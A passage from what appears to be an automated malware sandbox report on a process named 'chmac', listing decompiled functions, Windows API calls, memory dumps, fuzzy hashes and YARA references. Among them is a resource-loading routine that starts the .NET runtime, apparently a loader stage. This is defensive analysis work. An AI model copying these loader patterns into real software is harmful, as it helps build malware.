						L00401000(_t13, _t10); // executed
					}
				}
				FreeResource(_t16);
				goto L6;
			}

0x0040149f
0x004014a5
0x004014a9
0x004014ec
0x004014ee
0x004014ee
0x004014b7
0x004014bb
0x004014c7
0x004014cd
0x004014d3
0x004014d8
0x004014e0
0x004014e0
0x004014d8
0x004014e6
0x00000000

APIs

GetModuleHandleW.KERNEL32(00000000,00000001,0000000A,00000000,?,00000000,?,?,80004003), ref: 0040149C
FindResourceW.KERNELBASE(00000000,?,?,80004003), ref: 0040149F
GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014AE
LoadResource.KERNEL32(00000000,?,?,80004003), ref: 004014B1
LockResource.KERNEL32(00000000,?,?,80004003), ref: 004014BE
GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014CA
SizeofResource.KERNEL32(00000000,?,?,80004003), ref: 004014CD

Part of subcall function 00401489: CLRCreateInstance.MSCOREE(00410A70,00410A30,?), ref: 00401037

FreeResource.KERNEL32(00000000,?,?,80004003), ref: 004014E6
ExitProcess.KERNEL32 ref: 004014EE

Strings

v2.0.50727, xrefs: 00401053

Memory Dump Source

Source File: 0000000E.00000001.325106635.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000001.325215386.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_1_400000_chmac.jbxd

Yara matches

Similarity

API ID: Resource$HandleModule$CreateExitFindFreeInstanceLoadLockProcessSizeof
String ID: v2.0.50727
API String ID: 2372384083-2350909873
Opcode ID: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
Instruction ID: e1ffc0a1c1a4d9c60ba63a2b3d6c0bb581dd470f6d51773805e4de56b79455e5
Opcode Fuzzy Hash: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
Instruction Fuzzy Hash: C6F03C74A01304EBE6306BE18ECDF1B7A9CAF84789F050134FA01B62A0DA748C00C679

Uniqueness

Uniqueness Score: -1.00%

Function 048809A5, Relevance: 5.2, Strings: 4, Instructions: 175
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

X1q, xrefs: 04880AA2
X1q, xrefs: 04880A98
X1q, xrefs: 04880A5A
X1q, xrefs: 04880A50

Memory Dump Source

Source File: 0000000E.00000002.341504232.0000000004880000.00000040.00000001.sdmp, Offset: 04880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4880000_chmac.jbxd

Similarity

API ID:
String ID: X1q$X1q$X1q$X1q
API String ID: 0-1201878573
Opcode ID: de1250d2b1c505c498176b5e0ec6e5213f2a6e4b34639f450fa273ebb4cf5480
Instruction ID: 3bb95356613af7b70bb7d6835d0f58154ad141602d207f6ea0b3e45fb6ea5026
Opcode Fuzzy Hash: de1250d2b1c505c498176b5e0ec6e5213f2a6e4b34639f450fa273ebb4cf5480
Instruction Fuzzy Hash: 5A51E831B04115DFCB14ABA4D8546AEB7F2FF85308F228A69E556DB251DB30BD06DB80

Uniqueness

Uniqueness Score: -1.00%

Function 004055C5, Relevance: 3.0, APIs: 2, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004055C5(void* __ecx) {
				void* _t6;
				void* _t14;
				void* _t18;
				WCHAR* _t19;

				_t14 = __ecx;
				_t19 = GetEnvironmentStringsW();
				if(_t19 != 0) {
					_t12 = (E0040558E(_t19) - _t19 >> 1) + (E0040558E(_t19) - _t19 >> 1);
					_t6 = E00403E3D(_t14, (E0040558E(_t19) - _t19 >> 1) + (E0040558E(_t19) - _t19 >> 1)); // executed
					_t18 = _t6;
					if(_t18 != 0) {
						E0040ACF0(_t18, _t19, _t12);
					}
					E00403E03(0);
					FreeEnvironmentStringsW(_t19);
				} else {
					_t18 = 0;
				}
				return _t18;
			}

0x004055c5
0x004055cf
0x004055d3
0x004055e4
0x004055e8
0x004055ed
0x004055f3
0x004055f8
0x004055fd
0x00405602
0x00405609
0x004055d5
0x004055d5
0x004055d5
0x00405614

APIs

GetEnvironmentStringsW.KERNEL32 ref: 004055C9
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00405609

Memory Dump Source

Source File: 0000000E.00000001.325106635.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000001.325215386.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_1_400000_chmac.jbxd

Yara matches

Similarity

API ID: EnvironmentStrings$Free
String ID:
API String ID: 3328510275-0
Opcode ID: 8cd0ade3987da643afe372fdbc3b04457b893c98baeb1de225cc927f8a7ffae8
Instruction ID: c5c85d496f4b9afafe33008ffa5735024e7f647e2ae8fec8aafe46d04be69a25
Opcode Fuzzy Hash: 8cd0ade3987da643afe372fdbc3b04457b893c98baeb1de225cc927f8a7ffae8
Instruction Fuzzy Hash: E7E0E5371049206BD22127267C8AA6B2A1DCFC17B5765063BF809B61C2AE3D8E0208FD

Uniqueness

Uniqueness Score: -1.00%

Function 04880682, Relevance: 2.6, Strings: 2, Instructions: 145
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Yq^, xrefs: 04880702, 04880707
Zq^, xrefs: 048806A1, 048806A6

Memory Dump Source

Source File: 0000000E.00000002.341504232.0000000004880000.00000040.00000001.sdmp, Offset: 04880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4880000_chmac.jbxd

Similarity

API ID:
String ID: Zq^$Yq^
API String ID: 0-2195490495
Opcode ID: b053ac62a3cd0c5263817ab9c5cc46ebb08d591acb6e50dca38691fe971058d6
Instruction ID: 8879cdd5997ffee2a85b8e9d0bce389c71c79fac22ee3fc1fb1485bd2f3b681b
Opcode Fuzzy Hash: b053ac62a3cd0c5263817ab9c5cc46ebb08d591acb6e50dca38691fe971058d6
Instruction Fuzzy Hash: 9841AA3031D246CBC725BBB4FD1D16D7B62AF81702B158968F002EB2B6DF355C4AAB91

Uniqueness

Uniqueness Score: -1.00%

Function 048812A0, Relevance: 1.7, Strings: 1, Instructions: 460
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$gq, xrefs: 04881349

Memory Dump Source

Source File: 0000000E.00000002.341504232.0000000004880000.00000040.00000001.sdmp, Offset: 04880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4880000_chmac.jbxd

Similarity

API ID:
String ID: $gq
API String ID: 0-815412418
Opcode ID: 94eb751102aa5c79f074b38472c5d2de6918e4fc4c7ba1dd7c38e94dd3d648b9
Instruction ID: 4edf6c15e8e1c022d567f1c8d894c4467b48b2d4ccec4eae9a063c6b533c33ff
Opcode Fuzzy Hash: 94eb751102aa5c79f074b38472c5d2de6918e4fc4c7ba1dd7c38e94dd3d648b9
Instruction Fuzzy Hash: 5E22F334A00616CFCB24EF24C594A6AB7F2BF88304F50CA99D85A9B756DB34BD46CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0063AA7E, Relevance: 1.6, APIs: 1, Instructions: 92
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(?,00000E80), ref: 0063AB2D

Memory Dump Source

Source File: 0000000E.00000002.340780745.000000000063A000.00000040.00000001.sdmp, Offset: 0063A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_63a000_chmac.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 0b544ca26468be5656d17292b70f78ad619c575f7f8f6efba63a33e8d2dbbecc
Instruction ID: 6d7d8cf638fbe9c75b8f287510e68b58958c19744cecfb6577e86cbb4d43d1c8
Opcode Fuzzy Hash: 0b544ca26468be5656d17292b70f78ad619c575f7f8f6efba63a33e8d2dbbecc
Instruction Fuzzy Hash: C2310572444384AFE7228F24CC45FA7FFACEF06310F08859AED819B252D264E909C7B1

Uniqueness

Uniqueness Score: -1.00%

Function 0063AB75, Relevance: 1.6, APIs: 1, Instructions: 89
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryValueExW.KERNELBASE(?,00000E80,0043C00F,00000000,00000000,00000000,00000000), ref: 0063AC30

Memory Dump Source

Source File: 0000000E.00000002.340780745.000000000063A000.00000040.00000001.sdmp, Offset: 0063A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_63a000_chmac.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 0e42fb88cd157cb0751dbdd95da1faadc11c67770101e7176f662de74d33a21b
Instruction ID: 22bcfd33dc70b9c4f9c26b6cbcb50f375fcabd7941cb825afb4e76b9e3a7ec05
Opcode Fuzzy Hash: 0e42fb88cd157cb0751dbdd95da1faadc11c67770101e7176f662de74d33a21b
Instruction Fuzzy Hash: 3831A4711053805FE722CF65CC85FA2BFB8EF06710F18859AE985DB253D264E949CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 04B10416, Relevance: 1.6, APIs: 1, Instructions: 84
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNELBASE(?,?), ref: 04B104B1

Memory Dump Source

Source File: 0000000E.00000002.341760737.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4b10000_chmac.jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 56f9ab3d8aec25f2545c689b096abf11b602e46e6e9ebe9667b5e028e17c89de
Instruction ID: 8c2e3c4688c614ec43e82e88853abec7194c5023177064ddedef665272eb94ef
Opcode Fuzzy Hash: 56f9ab3d8aec25f2545c689b096abf11b602e46e6e9ebe9667b5e028e17c89de
Instruction Fuzzy Hash: 47318171505380AFE722DF69CD85F66FFE8EF05310F0884AAE9858B292D365E948C761

Uniqueness

Uniqueness Score: -1.00%

Function 0063B51B, Relevance: 1.6, APIs: 1, Instructions: 84
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetClassInfoW.USER32 ref: 0063B5BA

Memory Dump Source

Source File: 0000000E.00000002.340780745.000000000063A000.00000040.00000001.sdmp, Offset: 0063A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_63a000_chmac.jbxd

Similarity

API ID: ClassInfo
String ID:
API String ID: 3534257612-0
Opcode ID: f655a626ddcf121dc7a34953436caff802183555d8af56e4a674f0c257bc656a
Instruction ID: 861fbbe7a73dba2e8ee9368cfabf68261e599080109dffdbcb640a4de16ab7b6
Opcode Fuzzy Hash: f655a626ddcf121dc7a34953436caff802183555d8af56e4a674f0c257bc656a
Instruction Fuzzy Hash: 6B31287650E3C05FE7138B259C51A92BFB4AF07324F0A80DBD984CF2A3D2699909D772

Uniqueness

Uniqueness Score: -1.00%

Function 0063B080, Relevance: 1.6, APIs: 1, Instructions: 83
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetConsoleCtrlHandler.KERNELBASE(?,00000E80,?,?), ref: 0063B11A

Memory Dump Source

Source File: 0000000E.00000002.340780745.000000000063A000.00000040.00000001.sdmp, Offset: 0063A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_63a000_chmac.jbxd

Similarity

API ID: ConsoleCtrlHandler
String ID:
API String ID: 1513847179-0
Opcode ID: 3434ba061e15f59e8d7634b7d7d6f47375816e45b1439f24741513fc4a2811b7
Instruction ID: c7d1811ca2be2be405890faafa7205448471e8359910585bbfa6c61443885195
Opcode Fuzzy Hash: 3434ba061e15f59e8d7634b7d7d6f47375816e45b1439f24741513fc4a2811b7
Instruction Fuzzy Hash: C421C77540D3C06FD3138B258C51B62BFB4EF87610F0A84DBE984CB5A3D229A919C7B2

Uniqueness

Uniqueness Score: -1.00%

Function 0063AAAE, Relevance: 1.6, APIs: 1, Instructions: 74
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(?,00000E80), ref: 0063AB2D

Memory Dump Source

Source File: 0000000E.00000002.340780745.000000000063A000.00000040.00000001.sdmp, Offset: 0063A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_63a000_chmac.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 55797cc18e8ce7f0496e1c2157b352dbd410a1450558d5edbecbd5c363dd709d
Instruction ID: fc75856b9582624e7f417237a25ddfc25d5d5284c3b80562ec38efc54eab7fec
Opcode Fuzzy Hash: 55797cc18e8ce7f0496e1c2157b352dbd410a1450558d5edbecbd5c363dd709d
Instruction Fuzzy Hash: 8F21D172500304AFE721CF59CD85FABFBADEF04710F14855AED859B241D664E5088BB6

Uniqueness

Uniqueness Score: -1.00%

Function 04B1043E, Relevance: 1.6, APIs: 1, Instructions: 72
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNELBASE(?,?), ref: 04B104B1

Memory Dump Source

Source File: 0000000E.00000002.341760737.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4b10000_chmac.jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 0f531a53a9c2c5b3f0411365469a87abc5d5f89fcad0b1d7f8f3baffd09551ef
Instruction ID: 8b097b37cac098423c50cb5f829c8b950dcbc9775af7b7d5be1012eea2b6cb12
Opcode Fuzzy Hash: 0f531a53a9c2c5b3f0411365469a87abc5d5f89fcad0b1d7f8f3baffd09551ef
Instruction Fuzzy Hash: 7021CD71600240AFE721DF29CD85B66FBE8EF04320F1484AAED898B652E675F544CB76

Uniqueness

Uniqueness Score: -1.00%

Function 0063ABB6, Relevance: 1.6, APIs: 1, Instructions: 69
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryValueExW.KERNELBASE(?,00000E80,0043C00F,00000000,00000000,00000000,00000000), ref: 0063AC30

Memory Dump Source

Source File: 0000000E.00000002.340780745.000000000063A000.00000040.00000001.sdmp, Offset: 0063A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_63a000_chmac.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 33ab49de8935136c01cfa7e1f19e1b27e1436ff7b0e43f8caf93e4704b51ec50
Instruction ID: 64fe0ebc1d74a5b302fb3b62af52f5112d4c3f6c381ecc207f6a2fa89a269ec2
Opcode Fuzzy Hash: 33ab49de8935136c01cfa7e1f19e1b27e1436ff7b0e43f8caf93e4704b51ec50
Instruction Fuzzy Hash: 1921AE71600200AFE721CF55CD85FA2BBECEF04710F08946AED859B252E264E808DBB2

Uniqueness

Uniqueness Score: -1.00%

Function 0063BB8A, Relevance: 1.6, APIs: 1, Instructions: 61
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostMessageW.USER32(?,?,?,?), ref: 0063BC01

Memory Dump Source

Source File: 0000000E.00000002.340780745.000000000063A000.00000040.00000001.sdmp, Offset: 0063A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_63a000_chmac.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 5da2722f4264362e2127e663b4554aca80e1c275c770659778fa94cf9c032d5b
Instruction ID: 82a86e893d218e85663b8f75008c720aa35d571519a3a810bbcae6b3e5ffb49a
Opcode Fuzzy Hash: 5da2722f4264362e2127e663b4554aca80e1c275c770659778fa94cf9c032d5b
Instruction Fuzzy Hash: 36218E714097C09FDB228B21DC50AA2BFB0AF17324F0D84DAE9C44F263D265A958D762

Uniqueness

Uniqueness Score: -1.00%

Function 0063A59B, Relevance: 1.6, APIs: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0063A606

Memory Dump Source

Source File: 0000000E.00000002.340780745.000000000063A000.00000040.00000001.sdmp, Offset: 0063A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_63a000_chmac.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: ea3d982d4eca375b179506dfd9341b29b3920dc815d6a235e0312835ebb7e35e
Instruction ID: 7172038c8f887fae489c17ade7674e06575e972aa69e6602c383573cd2794883
Opcode Fuzzy Hash: ea3d982d4eca375b179506dfd9341b29b3920dc815d6a235e0312835ebb7e35e
Instruction Fuzzy Hash: 1C118471409380AFDB228F55DC44B62FFB4EF4A320F0885DAEDC58B163D275A419DB62

Uniqueness

Uniqueness Score: -1.00%

Function 0063BF0F, Relevance: 1.6, APIs: 1, Instructions: 59windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 0063BF79

Memory Dump Source

Source File: 0000000E.00000002.340780745.000000000063A000.00000040.00000001.sdmp, Offset: 0063A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_63a000_chmac.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 15bc7a79be294a3eff19846f09e649425576825437df86d7a993a1a625d87f11
Instruction ID: aa469572cb5386f908d0ab22f383c1cf96b4300c6c20fd50ac843f8063cfab69
Opcode Fuzzy Hash: 15bc7a79be294a3eff19846f09e649425576825437df86d7a993a1a625d87f11
Instruction Fuzzy Hash: DB11D3315093C09FDB228F25CC45B52FFB4EF16320F0885DEED858B653D265A818DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 04B10205, Relevance: 1.6, APIs: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32(?), ref: 04B10270

Memory Dump Source

Source File: 0000000E.00000002.341760737.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4b10000_chmac.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: 1c74c88420f9a1d8f925467d3a3370fa25ec380f30e13c38a83f5d565a3bb04c
Instruction ID: 42483326d99ce917dca1e19e10cd78615b18e9e80b1609001d090cbbf49479f9
Opcode Fuzzy Hash: 1c74c88420f9a1d8f925467d3a3370fa25ec380f30e13c38a83f5d565a3bb04c
Instruction Fuzzy Hash: E9118E754093C4AFDB138F259C44B61BFB4EF47624F0980DEED848F263D2696848CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0063BADE, Relevance: 1.6, APIs: 1, Instructions: 57windowCOMMON

Download Yara Rule

APIs

CreateIconFromResourceEx.USER32 ref: 0063BB4A

Memory Dump Source

Source File: 0000000E.00000002.340780745.000000000063A000.00000040.00000001.sdmp, Offset: 0063A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_63a000_chmac.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: 68c0022a91ff2814da255cd762fec6a19ae1a3d3785e19d143463eadf52b38bb
Instruction ID: 44ef1f7e7805c9be447ac1fdba9d7007f484449f7edea67b48919891cb2fef74
Opcode Fuzzy Hash: 68c0022a91ff2814da255cd762fec6a19ae1a3d3785e19d143463eadf52b38bb
Instruction Fuzzy Hash: 0A11A231405380AFDB22CF54DC44A52FFB4FF49320F08859EEA898B562C375A418CB61

Uniqueness

Uniqueness Score: -1.00%

Function 04B102B4, Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

SetCurrentDirectoryW.KERNELBASE(?), ref: 04B1030C

Memory Dump Source

Source File: 0000000E.00000002.341760737.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4b10000_chmac.jbxd

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: 789e0da10f0d050dcd00a12563eae5d8da8c7e520a3472daefa69bf043b19b37
Instruction ID: abace81011ee385b378c70ffde7f816c8aaf07cb2287d0514cb7856e5daee9d9
Opcode Fuzzy Hash: 789e0da10f0d050dcd00a12563eae5d8da8c7e520a3472daefa69bf043b19b37
Instruction Fuzzy Hash: 5811A3715053849FD711CF25DC85B56BFE8EF46220F0884EAED89CF662D275E848CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0063B572, Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

GetClassInfoW.USER32 ref: 0063B5BA

Memory Dump Source

Source File: 0000000E.00000002.340780745.000000000063A000.00000040.00000001.sdmp, Offset: 0063A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_63a000_chmac.jbxd

Similarity

API ID: ClassInfo
String ID:
API String ID: 3534257612-0
Opcode ID: 1de5b9d33aaea9ee5c6a8210c85d938ff8de0f960e0534909615d73cb787536f
Instruction ID: 14aa951fedc64cbc9501e14a951947f340f1748361eb1329af41f270674944e9
Opcode Fuzzy Hash: 1de5b9d33aaea9ee5c6a8210c85d938ff8de0f960e0534909615d73cb787536f
Instruction Fuzzy Hash: 3F0161756002408FE721CF19D985BA6FBE9EF04720F08D06ADE49CB752D765E808CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 0063A948, Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32 ref: 0063A9A2

Memory Dump Source

Source File: 0000000E.00000002.340780745.000000000063A000.00000040.00000001.sdmp, Offset: 0063A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_63a000_chmac.jbxd

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: dbbc83afb35418b23ea512283d1b8430c625e03f221968b38e6f94c8829211e0
Instruction ID: 8e010ceaec19ebc118df4e223d3d53db8066414c8cd20856907fff0615991c3f
Opcode Fuzzy Hash: dbbc83afb35418b23ea512283d1b8430c625e03f221968b38e6f94c8829211e0
Instruction Fuzzy Hash: 1011A0314057849FC721CF55DC85B52FFB4EF06320F09849AED854B262C279A808DB62

Uniqueness

Uniqueness Score: -1.00%

Function 04B102D2, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

SetCurrentDirectoryW.KERNELBASE(?), ref: 04B1030C

Memory Dump Source

Source File: 0000000E.00000002.341760737.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4b10000_chmac.jbxd

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: d7b87a945f044f16cb910e94a4c844d372b74e42c4fe52a2876adb6c3dc362c2
Instruction ID: ed04eb24a4b90ef678bef83f57bc9a3a3b2f1c18d3662d74262ed9493682d677
Opcode Fuzzy Hash: d7b87a945f044f16cb910e94a4c844d372b74e42c4fe52a2876adb6c3dc362c2
Instruction Fuzzy Hash: 7801B171A003408FDB51DF29E985766FBD8EF04620F48C0AADD49CFA56E674E448CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0063BB06, Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON

Download Yara Rule

APIs

CreateIconFromResourceEx.USER32 ref: 0063BB4A

Memory Dump Source

Source File: 0000000E.00000002.340780745.000000000063A000.00000040.00000001.sdmp, Offset: 0063A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_63a000_chmac.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: f3604e7f89f89df286bd0778556c032f9bd272987b202f5f577b0dba50dbb2c0
Instruction ID: ad82020749c72a2a15cc65eb39a9b6bce1721f624432ff00b3b8e5a78ead6fda
Opcode Fuzzy Hash: f3604e7f89f89df286bd0778556c032f9bd272987b202f5f577b0dba50dbb2c0
Instruction Fuzzy Hash: 4601AD31400240DFDB218F55D984B52FFA1FF08320F0884AAEE8A4B626D775A418DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0063A5C2, Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0063A606

Memory Dump Source

Source File: 0000000E.00000002.340780745.000000000063A000.00000040.00000001.sdmp, Offset: 0063A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_63a000_chmac.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: b3b390ff4a71daa6757cc3e298cc6157e4165584c3fc78f7a48bef0d94b4fec7
Instruction ID: 4be2da921272ec431f0dfd57bd8ff36de9b8b7835abcd7130f0d039072c9e63d
Opcode Fuzzy Hash: b3b390ff4a71daa6757cc3e298cc6157e4165584c3fc78f7a48bef0d94b4fec7
Instruction Fuzzy Hash: DA01AD314007409FDB21CF95DD45B52FFE1EF08320F08C49ADE894B662D275A419EFA2

Uniqueness

Uniqueness Score: -1.00%

Function 0063B0CA, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

SetConsoleCtrlHandler.KERNELBASE(?,00000E80,?,?), ref: 0063B11A

Memory Dump Source

Source File: 0000000E.00000002.340780745.000000000063A000.00000040.00000001.sdmp, Offset: 0063A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_63a000_chmac.jbxd

Similarity

API ID: ConsoleCtrlHandler
String ID:
API String ID: 1513847179-0
Opcode ID: 1e67cf233b0640087ee27544777189c8f98965bbc9597096ade1e470235ecf3e
Instruction ID: 7d9dc756b4dcc1fba5710b45fb3147fa47f5420d31ec8a7b2fd4e2754c38f648
Opcode Fuzzy Hash: 1e67cf233b0640087ee27544777189c8f98965bbc9597096ade1e470235ecf3e
Instruction Fuzzy Hash: A101AD75600200ABD250DF1ADC82B26FBA8FB88B20F14C15AED085B741E676F915CBE6

Uniqueness

Uniqueness Score: -1.00%

Function 0063BF3E, Relevance: 1.5, APIs: 1, Instructions: 42windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 0063BF79

Memory Dump Source

Source File: 0000000E.00000002.340780745.000000000063A000.00000040.00000001.sdmp, Offset: 0063A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_63a000_chmac.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 66fdb16bf526e84720b90fe786cb5b4f79623f4f71c0105513d80d60daec7e8f
Instruction ID: a0452e07b7c8d2b9dd4e5ad4737dd1a99548edf392a02eb00c8bae8b56e6be24
Opcode Fuzzy Hash: 66fdb16bf526e84720b90fe786cb5b4f79623f4f71c0105513d80d60daec7e8f
Instruction Fuzzy Hash: 6F019A315002409FDB218F15DC85B66FBA1EF18320F1890AEEE898B652D375A418DFA2

Uniqueness

Uniqueness Score: -1.00%

Function 0063BBC6, Relevance: 1.5, APIs: 1, Instructions: 38windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 0063BC01

Memory Dump Source

Source File: 0000000E.00000002.340780745.000000000063A000.00000040.00000001.sdmp, Offset: 0063A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_63a000_chmac.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 9389a2347a47374d138bd4bb75351514ac581aaa1278addb69985bac829f77ca
Instruction ID: 2388c1d7951ffe267140432502f9ed409d2ecf9295881c3bf7355a68f2a847ec
Opcode Fuzzy Hash: 9389a2347a47374d138bd4bb75351514ac581aaa1278addb69985bac829f77ca
Instruction Fuzzy Hash: 84018B35400344DFDB218F46D984B61FFA1EF18320F08E49ADE890B616D775A458DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0063A96A, Relevance: 1.5, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32 ref: 0063A9A2

Memory Dump Source

Source File: 0000000E.00000002.340780745.000000000063A000.00000040.00000001.sdmp, Offset: 0063A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_63a000_chmac.jbxd

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 490ccde96bfcfca4d056886cf0dddd9e9f560abcb602cee001e661801e1594d5
Instruction ID: db7bbdba2d8ad55d797e64e013c94bdd1831e7c2ec55aa417c2f62a7734197bc
Opcode Fuzzy Hash: 490ccde96bfcfca4d056886cf0dddd9e9f560abcb602cee001e661801e1594d5
Instruction Fuzzy Hash: 3401AD358006809FDB218F45DD88B51FFA0EF04720F18C4AADD8A1B692C275A408EBA2

Uniqueness

Uniqueness Score: -1.00%

Function 04B1023E, Relevance: 1.5, APIs: 1, Instructions: 35windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32(?), ref: 04B10270

Memory Dump Source

Source File: 0000000E.00000002.341760737.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4b10000_chmac.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: 1c7077ce7cbc62a1e67b0bccb11ed6d24a549d0debb04785f208253a779fd56a
Instruction ID: e126710c83373643a32fe2a37fdf2b8e6d03ea2d2911cf2eb04a32d96af69989
Opcode Fuzzy Hash: 1c7077ce7cbc62a1e67b0bccb11ed6d24a549d0debb04785f208253a779fd56a
